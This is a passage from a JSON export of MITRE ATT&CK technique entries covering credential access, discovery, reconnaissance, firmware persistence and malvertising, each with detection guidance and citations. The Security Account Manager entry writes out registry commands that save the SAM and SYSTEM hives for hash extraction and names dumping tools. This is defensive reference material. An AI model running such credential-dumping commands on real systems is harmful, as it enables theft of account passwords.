"Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf"}, {"source_name": "Michael J. Assante and Robert M. Lee", "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297"}, {"source_name": "Tyson Macaulay", "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Archive via Custom Method", "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "created": "2020-02-20T21:09:55.995Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1560/003", "external_id": "T1560.003"}, {"source_name": "ESET Sednit Part 2", "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-05T20:45:22.041Z", "name": "Modify Cloud Compute Infrastructure", "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", "created": "2019-08-30T18:03:05.864Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1578", "external_id": "T1578"}, {"source_name": "Mandiant M-Trends 2020", "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-19T12:24:40.659Z", "name": "Network Devices", "description": "Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.\n\nOnce an adversary has control, compromised network devices can be used to launch additional operations, such as hosting payloads for [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (i.e., [Link Target](https://attack.mitre.org/techniques/T1608/005)) or enabling the required access to execute [Content Injection](https://attack.mitre.org/techniques/T1659) operations. Adversaries may also be able to harvest reusable credentials (i.e., [Valid Accounts](https://attack.mitre.org/techniques/T1078)) from compromised network devices.\n\nAdversaries often target Internet-facing edge devices and related network appliances that specifically do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nCompromised network devices may be used to support subsequent [Command and Control](https://attack.mitre.org/tactics/TA0011) activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Botnet](https://attack.mitre.org/techniques/T1584/005) network.(Citation: Justice GRU 2024)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Gavin Knapp"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--149b477f-f364-4824-b1b5-aa1d56115869", "created": "2024-03-28T03:29:35.616Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1584/008", "external_id": "T1584.008"}, {"source_name": "Wired Russia Cyberwar", "description": "Greenberg, A. (2022, November 10). Russia\u2019s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.", "url": "https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/"}, {"source_name": "Mandiant Fortinet Zero Day", "description": "Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.", "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem"}, {"source_name": "Justice GRU 2024", "description": "Office of Public Affairs. (2024, February 15). Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation\u2019s Main Intelligence Directorate of the General Staff (GRU). Retrieved March 28, 2024.", "url": "https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-04-17T15:32:39.470Z", "name": "Malvertising", "description": "Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network\u2019s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. \n\nAdversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversary\u2019s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising) \n\nMalvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.(Citation: BBC-malvertising)\n\nAdversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Tom Hegel", "Goldstein Menachem", "Hiroki Nagahama, NEC Corporation", "Manikantan Srinivasan, NEC Corporation India", "Pooja Natarajan, NEC Corporation India", "Juan Carlos Campuzano - Mnemo-CERT"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--155207c0-7f53-4f13-a06b-0a9907ef5096", "created": "2023-02-21T20:46:57.170Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1583/008", "external_id": "T1583.008"}, {"source_name": "BBC-malvertising", "description": "BBC. (2011, March 29). Spotify ads hit by malware attack. Retrieved February 21, 2023.", "url": "https://www.bbc.com/news/technology-12891182"}, {"source_name": "FBI-search", "description": "FBI. (2022, December 21). Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users. Retrieved February 21, 2023.", "url": "https://www.ic3.gov/Media/Y2022/PSA221221"}, {"source_name": "sentinelone-malvertising", "description": "Hegel, Tom. (2023, January 19). Breaking Down the SEO Poisoning Attack | How Attackers Are Hijacking Search Results. Retrieved February 21, 2023.", "url": "https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/"}, {"source_name": "spamhaus-malvertising", "description": "Miller, Sarah. (2023, February 2). A surge of malvertising across Google Ads is distributing dangerous malware. Retrieved February 21, 2023.", "url": "https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/"}, {"source_name": "Masquerads-Guardio", "description": "Tal, Nati. (2022, December 28). \u201cMasquerAds\u201d \u2014 Google\u2019s Ad-Words Massively Abused by Threat Actors, Targeting Organizations, GPUs and Crypto Wallets. Retrieved February 21, 2023.", "url": "https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Permission Groups Discovery", "description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Daniel Prizmant, Palo Alto Networks", "Yuval Avrahami, Palo Alto Networks", "Microsoft Threat Intelligence Center (MSTIC)"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace", "Containers"], "x_mitre_version": "2.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "created": "2017-05-31T21:30:55.471Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1069", "external_id": "T1069"}, {"source_name": "K8s Authorization Overview", "description": "Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.", "url": "https://kubernetes.io/docs/reference/access-authn-authz/authorization/"}, {"source_name": "CrowdStrike BloodHound April 2018", "description": "Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.", "url": "https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-09-29T21:06:03.098Z", "name": "Email Collection", "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"], "x_mitre_deprecated": false, "x_mitre_detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365", "Google Workspace", "macOS", "Linux"], "x_mitre_version": "2.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "created": "2017-05-31T21:31:25.454Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1114", "external_id": "T1114"}, {"source_name": "Microsoft Tim McMichael Exchange Mail Forwarding 2", "description": "McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.", "url": "https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-07-24T18:53:10.860Z", "name": "Security Account Manager", "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.\n\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe\n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with Reg:\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)\n\nNotes: \n\n* RID 500 account is the local, built-in administrator.\n* RID 501 is the guest account.\n* User accounts start with a RID of 1,000+.\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Ed Williams, Trustwave, SpiderLabs", "Olaf Hartong, Falcon Force"], "x_mitre_deprecated": false, "x_mitre_detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", "created": "2020-02-11T18:42:07.281Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1003/002", "external_id": "T1003.002"}, {"source_name": "GitHub Creddump7", "description": "Flathers, R. (2018, February 19). creddump7. Retrieved April 11, 2018.", "url": "https://github.com/Neohapsis/creddump7"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "WHOIS", "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", "created": "2020-10-02T16:56:49.744Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1596/002", "external_id": "T1596.002"}, {"source_name": "WHOIS", "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", "url": "https://www.whois.net/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-16T12:21:51.311Z", "name": "System Firmware", "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Jean-Ian Boutin, ESET", "McAfee", "Ryan Becwar"], "x_mitre_deprecated": false, "x_mitre_detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host intrusion prevention systems", "Anti-virus", "File monitoring"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", "created": "2019-12-19T19:43:34.507Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1542/001", "external_id": "T1542.001"}, {"source_name": "McAfee CHIPSEC Blog", "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/"}, {"source_name": "MITRE Copernicus", "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.", "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about"}, {"source_name": "Intel HackingTeam UEFI Rootkit", "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", "url": "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html"}, {"source_name": "Github CHIPSEC", "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", "url": "https://github.com/chipsec/chipsec"}, {"source_name": "About UEFI", "description": "UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.", "url": "http://www.uefi.org/about"}, {"source_name": "MITRE Trustworthy Firmware Measurement", "description": "Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.", "url": "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research"}, {"source_name": "Wikipedia UEFI", "description": "Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.", "url": "https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface"}, {"source_name": "Wikipedia BIOS", "description": "Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.", "url": "https://en.wikipedia.org/wiki/BIOS"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Search Victim-Owned Websites", "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26", "created": "2020-10-02T16:51:50.306Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1594", "external_id": "T1594"}, {"source_name": "Comparitech Leak", "description": "Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020.", "url": "https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Cloud Groups", "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Regina Elwell", "Isif Ibrahima, Mandiant"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.", "x_mitre_domains": ["enterprise-attack"], 